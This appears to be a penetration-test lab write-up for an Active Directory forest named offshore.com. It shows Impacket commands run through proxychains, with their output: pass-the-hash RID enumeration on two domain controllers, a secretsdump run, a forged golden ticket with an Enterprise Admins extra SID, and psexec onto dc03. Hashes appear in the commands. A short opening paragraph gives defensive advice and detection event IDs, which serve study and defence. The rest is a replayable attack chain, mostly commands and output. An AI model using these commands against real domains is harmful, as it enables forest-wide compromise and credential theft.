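lookupsid

Impacket session tunnelled through proxychains (127.0.0.1:6000). lookupsid.py enumerates RIDs over \pipe\lsarpc on 172.16.2.6 (domain DEV) and on 172.16.3.5 (domain ADMIN). secretsdump.py is then run against 172.16.2.6, and ticketer.py forges a ticket for dev.admin.offshore.com with an -extra-sid ending in -519, the RID listed below as ADMIN\Enterprise Admins. Finally psexec.py presents that ticket to dc03.admin.offshore.com.

Defensive reading: SID filtering is not applied by default between domains of the same forest, so the forest, not the domain, is the security boundary. The -nthash passed to ticketer.py is presumably the DEV krbtgt key; once that key is exposed, reset krbtgt twice in that domain and treat the whole forest as affected. Telemetry matching each step: a burst of LSA SID lookups over SMB from a single source; directory replication requests (event 4662) from a host that is not a domain controller, if the dump used replication; service-ticket requests (4769) with no preceding TGT request (4768) from the same client; and a new service installed on the target (7045).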

 
└─$ proxychains -f proxychains4.conf lookupsid.py dev.admin.offshore.com/Administrator@172.16.2.6 -hashes c61f43b6a4db2676714713836b7d2ea6:c61f43b6a4db2676714713836b7d2ea6
[proxychains] config file found: proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra
 
[*] Brute forcing SIDs at 172.16.2.6
[*] StringBinding ncacn_np:172.16.2.6[\pipe\lsarpc]
[proxychains] Strict chain  ...  127.0.0.1:6000  ...  172.16.2.6:445  ...  OK
[*] Domain SID is: S-1-5-21-1416445593-394318334-2645530166
500: DEV\Administrator (SidTypeUser)
501: DEV\Guest (SidTypeUser)
502: DEV\krbtgt (SidTypeUser)
503: DEV\DefaultAccount (SidTypeUser)
512: DEV\Domain Admins (SidTypeGroup)
513: DEV\Domain Users (SidTypeGroup)
514: DEV\Domain Guests (SidTypeGroup)
515: DEV\Domain Computers (SidTypeGroup)
516: DEV\Domain Controllers (SidTypeGroup)
517: DEV\Cert Publishers (SidTypeAlias)
520: DEV\Group Policy Creator Owners (SidTypeGroup)
521: DEV\Read-only Domain Controllers (SidTypeGroup)
522: DEV\Cloneable Domain Controllers (SidTypeGroup)
525: DEV\Protected Users (SidTypeGroup)
526: DEV\Key Admins (SidTypeGroup)
553: DEV\RAS and IAS Servers (SidTypeAlias)
571: DEV\Allowed RODC Password Replication Group (SidTypeAlias)
572: DEV\Denied RODC Password Replication Group (SidTypeAlias)
1000: DEV\DC02$ (SidTypeUser)
1101: DEV\DnsAdmins (SidTypeAlias)
1102: DEV\DnsUpdateProxy (SidTypeGroup)
1103: DEV\ADMIN$ (SidTypeUser)
1104: DEV\WS03$ (SidTypeUser)
1105: DEV\IIS_dev (SidTypeUser)
1108: DEV\CORP_admins (SidTypeAlias)
1109: DEV\CORP$ (SidTypeUser)
1604: DEV\joe (SidTypeUser)
                                
 
└─$ proxychains -f proxychains4.conf lookupsid.py dev.admin.offshore.com/Administrator@172.16.3.5 -hashes c61f43b6a4db2676714713836b7d2ea6:c61f43b6a4db2676714713836b7d2ea6                                                    
[proxychains] config file found: proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra
 
[*] Brute forcing SIDs at 172.16.3.5
[*] StringBinding ncacn_np:172.16.3.5[\pipe\lsarpc]
[proxychains] Strict chain  ...  127.0.0.1:6000  ...  172.16.3.5:445  ...  OK
[*] Domain SID is: S-1-5-21-1216317506-3509444512-4230741538
498: ADMIN\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: ADMIN\Administrator (SidTypeUser)
501: ADMIN\Guest (SidTypeUser)
502: ADMIN\krbtgt (SidTypeUser)
503: ADMIN\DefaultAccount (SidTypeUser)
512: ADMIN\Domain Admins (SidTypeGroup)
513: ADMIN\Domain Users (SidTypeGroup)
514: ADMIN\Domain Guests (SidTypeGroup)
515: ADMIN\Domain Computers (SidTypeGroup)
516: ADMIN\Domain Controllers (SidTypeGroup)
517: ADMIN\Cert Publishers (SidTypeAlias)
518: ADMIN\Schema Admins (SidTypeGroup)
519: ADMIN\Enterprise Admins (SidTypeGroup)
520: ADMIN\Group Policy Creator Owners (SidTypeGroup)
521: ADMIN\Read-only Domain Controllers (SidTypeGroup)
522: ADMIN\Cloneable Domain Controllers (SidTypeGroup)
525: ADMIN\Protected Users (SidTypeGroup)
526: ADMIN\Key Admins (SidTypeGroup)
527: ADMIN\Enterprise Key Admins (SidTypeGroup)
553: ADMIN\RAS and IAS Servers (SidTypeAlias)
571: ADMIN\Allowed RODC Password Replication Group (SidTypeAlias)
572: ADMIN\Denied RODC Password Replication Group (SidTypeAlias)
1000: ADMIN\DC03$ (SidTypeUser)
1101: ADMIN\DnsAdmins (SidTypeAlias)
1102: ADMIN\DnsUpdateProxy (SidTypeGroup)
1107: ADMIN\MS01$ (SidTypeUser)
1108: ADMIN\WS04$ (SidTypeUser)
1114: ADMIN\MSSP (SidTypeAlias)
3101: ADMIN\DEV$ (SidTypeUser)
3104: ADMIN\CLIENT$ (SidTypeUser)
3105: ADMIN\ADMIN$$$ (SidTypeAlias)
3113: ADMIN\bankvault (SidTypeUser)
 
└─$ proxychains -f proxychains4.conf secretsdump.py dev.admin.offshore.com/Administrator@172.16.2.6 -hashes c61f43b6a4db2676714713836b7d2ea6:c61f43b6a4db2676714713836b7d2ea6
(output of this command is not included in these notes)
 
 
└─$ proxychains -f proxychains4.conf ticketer.py -nthash 9404def404bc198fd9830a3483869e78 -domain dev.admin.offshore.com -domain-sid S-1-5-21-1416445593-394318334-2645530166 -extra-sid S-1-5-21-1216317506-3509444512-4230741538-519 Administrator       
 
 
 
 
[proxychains] config file found: proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.1.dev1+20230502.194317.86a9fffe - Copyright 2022 Fortra
 
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for dev.admin.offshore.com/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncAsRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncASRepPart
[*] Saving ticket in Administrator.ccache
 
export KRB5CCNAME=Administrator.ccache

 
└─$ proxychains -f proxychains4.conf psexec.py dev.admin.offshore.com/Administrator@dc03.admin.offshore.com -k -no-pass -target-ip 172.16.3.5